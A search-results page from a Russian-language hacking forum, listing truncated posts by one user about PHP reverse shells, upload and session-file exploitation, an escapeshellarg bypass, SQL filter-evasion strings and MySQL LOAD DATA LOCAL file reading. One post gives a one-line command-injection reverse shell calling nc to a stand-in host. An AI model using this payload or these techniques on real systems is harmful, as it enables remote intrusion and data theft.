Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 231.
На поиск затрачено 0.02 сек.
Поиск: Сообщения от: d0znpp
Раздел: Релизы/Releases 08.04.2015, 05:58
Ответов: 1
Просмотров: 10,982
Автор d0znpp
PHP reverse eval shell

Сделан для прокидывания через RCE при ограничениях exec() и подобному.

Использует только fsockopen и eval
Форкается если есть pcntl_fork



set_time_limit(0);
if...
Раздел: Статьи/Articles 06.05.2014, 12:09
Ответов: 16
Просмотров: 43,200
Автор d0znpp
1. pickle в отличии от РНР вообще сразу дает RCE,...

1. pickle в отличии от РНР вообще сразу дает RCE, так как поддерживает десериализацию кода - https://blog.nelhage.com/2011/03/exploiting-pickle/

2. java при десериализации можно порой указать свой...
Раздел: Web-среда/Web-applications 26.07.2013, 17:20
Ответов: 3,618
Просмотров: 2,166,761
Автор d0znpp
она во внутренней сети и ничем не поможет тебе,...

она во внутренней сети и ничем не поможет тебе, напиши, какой вектор атаки хочешь развернуть в итоге?
Может, есть смысл писать триггеры сразу: http://www.wisec.it/sectou.php?p=1
Раздел: Повышение привилегий/Privilege escalation 06.06.2013, 10:14
Ответов: 11
Просмотров: 12,816
Автор d0znpp
это выглядит как фейк :) особенно странно, что...

это выглядит как фейк :)
особенно странно, что ничего про версии не пишут, как понимаю, сейчас на nginx все вообще)

Ключ тут:

Кто потестит - отпишите, у меня по нулям все пока
...
Раздел: Мировые новости/World news 03.05.2013, 01:11
Ответов: 0
Просмотров: 6,854
Автор d0znpp
PHDays 2013 hackquest

Кто еще не в курсе, вот здесь:
hackquest.phdays.com (http://hackquest.phdays.com)

розыгрываются 20 билетов и 20 фирменных футболок PHDays 2013, который пройдет в Москве 23-24 мая

Всем удачи!
Раздел: Web-среда/Web-applications 25.04.2013, 19:10
Ответов: 3,618
Просмотров: 2,166,761
Автор d0znpp
прочитай cfg.php залезь через бэкдор в админку...

прочитай cfg.php
залезь через бэкдор в админку - _authChkUser_
погляди что делает ChkUser
Раздел: Уязвимости PHP/PHP vulnerabilities 03.04.2013, 13:19
Ответов: 4
Просмотров: 11,256
Автор d0znpp
Exploiting restricted uploaders In many...

Exploiting restricted uploaders

In many cases uploader vulns restricted by filesystem privileges.
You can upload arbitrary files in /tmp directory, but can't upload into /var/www and others.
...
Раздел: Уязвимости PHP/PHP vulnerabilities 02.04.2013, 12:53
Ответов: 4
Просмотров: 11,256
Автор d0znpp
думаю, что это можно спускать, если нету...

думаю, что это можно спускать, если нету обсуждения здесь
Раздел: Уязвимости PHP/PHP vulnerabilities 31.03.2013, 22:04
Ответов: 4
Просмотров: 11,256
Автор d0znpp
Эксплуатация ограниченных писалок через PHP сессии

Часто бывают случаи, когда надо проэксплуатировать ограниченные по правам аплоадеры и прочие штуки.
Для этого хорошо подходят файлы сессий, так как они располагаются в писабельной зоне (обычно /tmp)...
Раздел: Уязвимости PHP/PHP vulnerabilities 24.03.2013, 22:29
Ответов: 1
Просмотров: 12,029
Автор d0znpp
можно спускать, блогпост готов

можно спускать, блогпост готов
Раздел: Уязвимости PHP/PHP vulnerabilities 15.03.2013, 02:29
Ответов: 1
Просмотров: 12,029
Автор d0znpp
PHP escapeshellarg bypass 0day :)

Очевидная и действенная мера.
В РНР нет способа штатными средствами защититься от атак RCE через вызов exec консольных утилит, которые парсят параметры.
То есть escapeshellarg корректно делает из...
Раздел: Windows 13.03.2013, 21:34
Ответов: 12
Просмотров: 15,620
Автор d0znpp
начни с того, чтобы понять с чем имеешь дело ...

начни с того, чтобы понять с чем имеешь дело

- если это шифр - надо узнать какой, проще всего это сделать найдя программу, которой он был создан (зашифрован)
- можешь также попробовать...
Раздел: Web-среда/Web-applications 11.03.2013, 23:56
Ответов: 3,618
Просмотров: 2,166,761
Автор d0znpp
frOM FR/**/OM #text%0aFROM%0a или...

frOM
FR/**/OM
#text%0aFROM%0a

или использовать JOIN
Раздел: Web-среда/Web-applications 03.03.2013, 07:39
Ответов: 11
Просмотров: 16,160
Автор d0znpp
отличный вариант! у меня был nc, но не было / в...

отличный вариант! у меня был nc, но не было / в жизни
Раздел: Web-среда/Web-applications 03.03.2013, 07:35
Ответов: 11
Просмотров: 16,160
Автор d0znpp
l1ght, b3, спасибо вам, вы поняли задачу! ...

l1ght, b3, спасибо вам, вы поняли задачу!

Еще раз для уточнения - ищется sh-based shell, то есть RCE готовая, но надо прокинуть шелл в одну команду.
В жизни очень часто бывает, когда твои кластер...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 01.03.2013, 15:23
Ответов: 11
Просмотров: 28,383
Автор d0znpp
Она работает в MySQL клиенте под PHP, ей вообще...

Она работает в MySQL клиенте под PHP, ей вообще пофигу на MySQL сервепр почти. Файло чистается с правами PHP.

Сначала был mysqli, потом mysqlnd стал (5.3 точно по-дефолту, раньше как настроишь). В...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 01.03.2013, 14:00
Ответов: 11
Просмотров: 28,383
Автор d0znpp
Оно вообще не работает, когда open_basedir хоть...

Оно вообще не работает, когда open_basedir хоть как-то настроен, кроме отключенного
https://bugs.php.net/bug.php?id=55737
Раздел: Web-среда/Web-applications 28.02.2013, 13:28
Ответов: 11
Просмотров: 16,160
Автор d0znpp
ну и как ты это пропихнешь через готовый system...

ну и как ты это пропихнешь через готовый system вызов? это РНР шелл, а я про шелл из команд ОС
Раздел: Web-среда/Web-applications 28.02.2013, 12:26
Ответов: 11
Просмотров: 16,160
Автор d0znpp
Короткий шелл

Задался целью написания короткого шелла для RCE типа

system("stat {$_GET['a']}");



пока самый простой вариант:

|nc evil.com 12345|sh|
Раздел: Оффтоп/Offtopic 27.02.2013, 18:13
Ответов: 6
Просмотров: 9,809
Автор d0znpp
купил нерабочий сплоит - проси назад деньги,...

купил нерабочий сплоит - проси назад деньги, договор оферты и все такое :)))
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 27.02.2013, 09:13
Ответов: 11
Просмотров: 28,383
Автор d0znpp
Допы - до 6ки оно включено на стороне сервера...

Допы
- до 6ки оно включено на стороне сервера (последние 5ки тоже выключены, не отследил)
- на стороне клиента включается в каждом конкретном случае по-своему, для РНР чаще всего включено
- чтение...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 24.02.2013, 18:17
Ответов: 5
Просмотров: 2,230
Автор d0znpp
Это реально хороши известный факт, который...

Это реально хороши известный факт, который почему-то не особо описан.
То есть раздел "6.1.6. Security Issues with LOAD DATA LOCAL" черным по белому говорит о нем.
Какой странный ужас :)
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 24.02.2013, 14:06
Ответов: 5
Просмотров: 2,230
Автор d0znpp
Смысл в том, что здесь файл берется с клиента. То...

Смысл в том, что здесь файл берется с клиента. То есть при системе в два сервера - БД и сервер приложений, вы таким образом положите в таблицу БД файл с сервера приложений, а load_file прочитал бы...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 24.02.2013, 12:39
Ответов: 5
Просмотров: 2,230
Автор d0znpp
)%)))

)%)))
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 24.02.2013, 00:58
Ответов: 5
Просмотров: 2,230
Автор d0znpp
Эксплуатация IO MySQL без FILE_PRIV

LOAD DATA LOCAL

http://dev.mysql.com/doc/refman/5.5/en/load-data-local.html
Показано с 1 по 25 из 231.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot